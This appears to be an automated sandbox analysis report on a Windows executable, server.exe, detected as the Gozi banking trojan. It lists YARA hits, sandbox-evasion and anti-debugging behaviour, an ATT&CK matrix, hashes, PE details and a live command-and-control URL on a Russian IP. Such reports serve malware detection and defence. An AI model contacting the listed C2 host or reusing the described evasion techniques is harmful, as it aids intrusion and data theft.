    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E16DF
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E832C
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1D8A
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00412E5E
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004129C9
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004135CE
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004131FC
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004139B6
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E8551 NtQueryVirtualMemory,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00781C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
    Source: server.exeReversingLabs: Detection: 38%
    Source: server.exeVirustotal: Detection: 50%
    Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
    Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E7F30 push ecx; ret
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E831B push ecx; ret
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085D0A4 push ebp; ret
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00857CD7 push 8B8751D0h; retf
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085DAFD push ds; ret
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0085D782 push ds; ret
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 98 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 82 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 46 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040Thread sleep count: 99 > 30
    Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.509882695.00000000008B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0078092B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00780D90 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_008551AC push dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,
    Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
    Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
    Source: C:\Users\user\Desktop\server.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
    Source: C:\Users\user\Desktop\server.exeCode function: __crtGetLocaleInfoA_stat,
    Source: C:\Users\user\Desktop\server.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,
    Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E3BD3 cpuid
    Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Windows Management Instrumentation
    Path InterceptionPath Interception11
    Virtualization/Sandbox Evasion
    1
    Input Capture
    1
    System Time Discovery
    Remote Services1
    Input Capture
    Exfiltration Over Other Network Medium2
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    Data Encrypted for Impact
    Default Accounts12
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS Memory11
    Security Software Discovery
    Remote Desktop Protocol11
    Archive Collected Data
    Exfiltration Over Bluetooth1
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
    Software Packing
    Security Account Manager11
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
    Process Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer12
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    Account Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
    System Owner/User Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
    Remote System Discovery
    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
    System Information Discovery
    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    server.exe38%ReversingLabsWin32.Trojan.Generic
    server.exe51%VirustotalBrowse
    server.exe100%Joe Sandbox ML
    No Antivirus matches
    SourceDetectionScannerLabelLinkDownload
    0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
    0.2.server.exe.7e0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://62.173.142.51/0%Avira URL Cloudsafe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk0%Avira URL Cloudsafe
    http://62.173.142.51/b0%Avira URL Cloudsafe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb0%Avira URL Cloudsafe
    http://62.1730%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    windowsupdatebg.s.llnwi.net
    95.140.230.192
    truefalse
      unknown
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlkfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://62.173.142.51/bserver.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://62.173.142.51/server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2Bserver.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://62.173server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLbserver.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          62.173.142.51
          unknownRussian Federation
          34300SPACENET-ASInternetServiceProviderRUfalse
          Joe Sandbox Version:37.0.0 Beryl
          Analysis ID:825996
          Start date and time:2023-03-14 08:23:06 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 5m 45s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:13
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:server.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@1/1
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 18.4% (good quality ratio 17.6%)
          • Quality average: 81.1%
          • Quality standard deviation: 27.8%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 209.197.3.8, 93.184.221.240
          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, dual-a-0001.dc-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          No context
          No context
          No context
          No context
          No context
          No created / dropped files found
          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.821157222424382
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:server.exe
          File size:239104
          MD5:bfe5c79a11ef437d401fe8a27ea49372
          SHA1:bd04d26776c766934f0acd2885cf97168dc5bbfb
          SHA256:881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
          SHA512:4b803dd0a1f8c378d4e61f753aa84a690908dcd2de8289e331f4b7cbbc28480883f7b26f272dfc0e109ef133a59642f2221981caf4dcaae6412a2439a2e38fb9
          SSDEEP:6144:iIOuqy8KhQd+1x8toQRwwzsjqxn2Sc4gKO:iLTydhQdjtoR8sjqxn2ScKO
          TLSH:CA349E137391A871E6324A31BE1BC2F5661EFCA44F5967EB23946A2F0D752E1CE31342
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L......b...........................
          Icon Hash:9a82325a89a28ab2
          Entrypoint:0x409761
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x620D9091 [Thu Feb 17 00:02:25 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:ae274c29ca15928cb1e23f2e712ba155
          Instruction
          call 00007F46FCF0236Eh
          jmp 00007F46FCEFBD8Eh
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          test eax, eax
          je 00007F46FCEFBF14h
          sub eax, 08h
          cmp dword ptr [eax], 0000DDDDh
          jne 00007F46FCEFBF09h
          push eax
          call 00007F46FCEFB527h
          pop ecx
          pop ebp
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov esi, ecx
          mov byte ptr [esi+0Ch], 00000000h
          test eax, eax
          jne 00007F46FCEFBF65h
          call 00007F46FCEFEEDDh
          mov dword ptr [esi+08h], eax
          mov ecx, dword ptr [eax+6Ch]
          mov dword ptr [esi], ecx
          mov ecx, dword ptr [eax+68h]
          mov dword ptr [esi+04h], ecx
          mov ecx, dword ptr [esi]
          cmp ecx, dword ptr [0042D340h]
          je 00007F46FCEFBF14h
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF09h
          call 00007F46FCF02D48h
          mov dword ptr [esi], eax
          mov eax, dword ptr [esi+04h]
          cmp eax, dword ptr [0042D000h]
          je 00007F46FCEFBF18h
          mov eax, dword ptr [esi+08h]
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF0Ah
          call 00007F46FCF025A7h
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [esi+08h]
          test byte ptr [eax+70h], 00000002h
          jne 00007F46FCEFBF16h
          or dword ptr [eax+70h], 02h
          mov byte ptr [esi+0Ch], 00000001h
          jmp 00007F46FCEFBF0Ch
          mov ecx, dword ptr [eax]
          mov dword ptr [esi], ecx
          mov eax, dword ptr [eax+04h]
          mov dword ptr [esi+04h], eax
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          sub esp, 10h
          mov eax, dword ptr [0042C908h]
          xor eax, ebp
          mov dword ptr [ebp-04h], eax
          mov edx, dword ptr [ebp+18h]
          push ebx
          Programming Language:
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2010 build 30319
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000xdd08.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x18a140x18c00False0.5078519570707071data6.313918932739284IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x1a0000x90e880x13800False0.9314778645833334data7.82921848401168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xab0000xdd080xde00False0.4086782094594595data4.407077801593062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          RT_CURSOR0xb6f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb70900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb71c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
          RT_CURSOR0xb72b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
